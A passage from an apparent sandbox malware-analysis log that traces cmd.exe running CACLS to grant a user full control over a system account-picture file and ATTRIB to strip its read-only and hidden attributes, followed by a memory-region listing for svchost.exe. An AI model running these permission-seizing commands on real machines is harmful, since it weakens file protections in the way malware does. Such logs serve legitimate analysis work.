_String2="START") returned -16 [0181.547] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0181.547] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0181.547] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0181.547] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0181.547] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0181.547] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0181.547] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0181.547] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0181.547] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0181.547] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0181.547] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0181.547] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0181.547] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0181.547] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0181.547] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0181.547] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0181.547] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0181.547] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0181.548] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0181.548] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0181.548] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0181.548] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0181.548] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0181.548] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0181.548] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0181.548] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0181.548] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0181.548] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0181.548] _wcsicmp (_String1="CACLS", 
_String2="RMDIR") returned -15 [0181.548] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0181.548] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0181.548] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0181.548] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0181.548] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0181.548] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0181.548] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0181.548] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0181.548] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0181.548] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0181.548] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0181.548] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0181.548] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0181.548] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0181.548] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0181.548] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0181.548] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0181.548] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0181.548] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0181.548] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0181.548] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0181.548] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0181.548] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0181.548] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0181.548] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0181.548] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0181.549] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0181.549] SetErrorMode (uMode=0x0) returned 0x0 [0181.549] SetErrorMode (uMode=0x1) 
returned 0x0 [0181.549] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b1e98, lpFilePart=0x1cf2f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf2f4*="Desktop") returned 0x18 [0181.549] SetErrorMode (uMode=0x0) returned 0x1 [0181.549] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.549] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0181.554] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0181.554] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.555] GetLastError () returned 0x2 [0181.555] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.555] GetLastError () returned 0x2 [0181.555] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0x3b2180 [0181.555] FindClose (in: hFindFile=0x3b2180 | out: hFindFile=0x3b2180) returned 1 [0181.555] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.555] GetLastError () returned 0x2 [0181.555] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cf070, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0x3b2180 [0181.555] FindClose (in: hFindFile=0x3b2180 | out: hFindFile=0x3b2180) returned 1 [0181.556] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0181.556] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0181.556] GetConsoleTitleW (in: lpConsoleTitle=0x1cf568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.556] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf3f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf4b8 | out: lpAttributeList=0x1cf3f0, lpSize=0x1cf4b8) returned 1 [0181.556] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf3f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf4b0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf3f0, lpPreviousValue=0x0) returned 1 [0181.556] GetStartupInfoW (in: lpStartupInfo=0x1cf3ac | out: lpStartupInfo=0x1cf3ac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0181.556] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0181.557] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf44c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, 
dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf498 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1cf498*(hProcess=0x50, hThread=0x4c, dwProcessId=0xcd0, dwThreadId=0xc98)) returned 1 [0181.559] CloseHandle (hObject=0x4c) returned 1 [0181.559] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0181.559] GetEnvironmentStringsW () returned 0x3b0308* [0181.559] FreeEnvironmentStringsW (penv=0x3b0308) returned 1 [0181.559] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0181.779] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf38c | out: lpExitCode=0x1cf38c*=0x0) returned 1 [0181.779] CloseHandle (hObject=0x50) returned 1 [0181.779] _vsnwprintf (in: _Buffer=0x1cf4d4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf398 | out: _Buffer="00000000") returned 8 [0181.779] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0181.779] GetEnvironmentStringsW () returned 0x3b2410* [0181.779] FreeEnvironmentStringsW (penv=0x3b2410) returned 1 [0181.779] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0181.779] GetEnvironmentStringsW () returned 0x3b2410* [0181.779] FreeEnvironmentStringsW (penv=0x3b2410) returned 1 [0181.779] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf3f0 | out: lpAttributeList=0x1cf3f0) [0181.779] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.780] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.780] 
NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0181.780] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0181.780] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.780] GetLastError () returned 0x2 [0181.780] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.781] GetLastError () returned 0x2 [0181.781] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0x3ae4d8 [0181.781] FindClose (in: hFindFile=0x3ae4d8 | out: hFindFile=0x3ae4d8) returned 1 [0181.781] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.781] GetLastError () returned 0x2 [0181.781] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0x3ae4d8 [0181.781] FindClose (in: hFindFile=0x3ae4d8 | out: hFindFile=0x3ae4d8) returned 1 [0181.781] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0181.781] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0181.781] GetConsoleTitleW (in: lpConsoleTitle=0x1cf568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.782] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf3f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf4b8 | out: lpAttributeList=0x1cf3f0, lpSize=0x1cf4b8) returned 1 [0181.782] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf3f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf4b0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf3f0, lpPreviousValue=0x0) returned 1 [0181.782] GetStartupInfoW (in: lpStartupInfo=0x1cf3ac | out: lpStartupInfo=0x1cf3ac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0181.782] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0181.782] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf44c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf498 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"", lpProcessInformation=0x1cf498*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa10, dwThreadId=0xc38)) returned 1 [0181.784] CloseHandle (hObject=0x50) 
returned 1 [0181.784] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0181.784] GetEnvironmentStringsW () returned 0x3b2410* [0181.784] FreeEnvironmentStringsW (penv=0x3b2410) returned 1 [0181.784] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0181.877] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cf38c | out: lpExitCode=0x1cf38c*=0x0) returned 1 [0181.877] CloseHandle (hObject=0x4c) returned 1 [0181.877] _vsnwprintf (in: _Buffer=0x1cf4d4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf398 | out: _Buffer="00000000") returned 8 [0181.877] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0181.877] GetEnvironmentStringsW () returned 0x3b2410* [0181.877] FreeEnvironmentStringsW (penv=0x3b2410) returned 1 [0181.877] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0181.877] GetEnvironmentStringsW () returned 0x3b2410* [0181.877] FreeEnvironmentStringsW (penv=0x3b2410) returned 1 [0181.877] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf3f0 | out: lpAttributeList=0x1cf3f0) [0181.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.877] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0181.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.877] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0181.877] _get_osfhandle (_FileHandle=0) returned 0x3 [0181.877] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0181.877] SetConsoleInputExeNameW () returned 0x1 [0181.878] GetConsoleOutputCP () returned 0x1b5 [0181.878] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0181.878] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.878] exit (_Code=0) Process: id = "339" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea16200" os_pid = "0x3e8" os_integrity_level = 
"0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "337" os_parent_pid = "0xb88" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c2d0" [0xc000000f], "LOCAL" [0x7] Region: id = 25313 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25314 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25315 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25316 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25317 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 25318 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25319 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000100000" filename = "" Region: id = 25320 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 25321 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 25322 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 25323 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 25324 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 25325 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 25326 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25327 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 25328 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 25329 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 25330 start_va = 0x3a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 25331 start_va = 0x4b0000 end_va = 0x52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 25332 start_va = 0x530000 end_va = 0x922fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 25333 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 25334 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 25335 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 25336 start_va = 0xac0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 25337 start_va = 0xb70000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 25338 start_va = 0xbb0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 25339 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 25340 start_va = 0xc30000 end_va = 0xefefff entry_point = 0xc30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 25341 start_va = 0xf00000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 25342 start_va = 0x1010000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 25343 start_va = 0x1070000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 25344 start_va = 0x10d0000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 
25345 start_va = 0x1120000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 25346 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 25347 start_va = 0x11b0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 25348 start_va = 0x12b0000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 25349 start_va = 0x13f0000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 25350 start_va = 0x1400000 end_va = 0x14bffff entry_point = 0x1400000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 25351 start_va = 0x15e0000 end_va = 0x15effff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 25352 start_va = 0x1680000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 25353 start_va = 0x16c0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 25354 start_va = 0x17a0000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 25355 start_va = 0x17e0000 end_va = 0x181ffff entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 25356 start_va = 0x6e2d0000 end_va = 0x6e319fff entry_point = 0x6e2d0000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 25357 start_va = 
0x6e5a0000 end_va = 0x6e5acfff entry_point = 0x6e5a0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 25358 start_va = 0x6e5b0000 end_va = 0x6e5b2fff entry_point = 0x6e5b0000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 25359 start_va = 0x6e5c0000 end_va = 0x6e5d1fff entry_point = 0x6e5c0000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 25360 start_va = 0x6e5e0000 end_va = 0x6e66ffff entry_point = 0x6e5e0000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 25361 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 25362 start_va = 0x6e8a0000 end_va = 0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 25363 start_va = 0x6f290000 end_va = 0x6f2f0fff entry_point = 0x6f290000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 25364 start_va = 0x6f8d0000 end_va = 0x6f8e1fff entry_point = 0x6f8d0000 region_type = mapped_file name = "vmictimeprovider.dll" filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 25365 start_va = 0x6fcf0000 end_va = 0x6fd3efff entry_point = 0x6fcf0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" 
(normalized: "c:\\windows\\system32\\webio.dll") Region: id = 25366 start_va = 0x6fd40000 end_va = 0x6fd97fff entry_point = 0x6fd40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 25367 start_va = 0x6fff0000 end_va = 0x70004fff entry_point = 0x6fff0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 25368 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 25369 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 25370 start_va = 0x71f60000 end_va = 0x71f67fff entry_point = 0x71f60000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 25371 start_va = 0x71f70000 end_va = 0x71f81fff entry_point = 0x71f70000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 25372 start_va = 0x733c0000 end_va = 0x733cffff entry_point = 0x733c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: 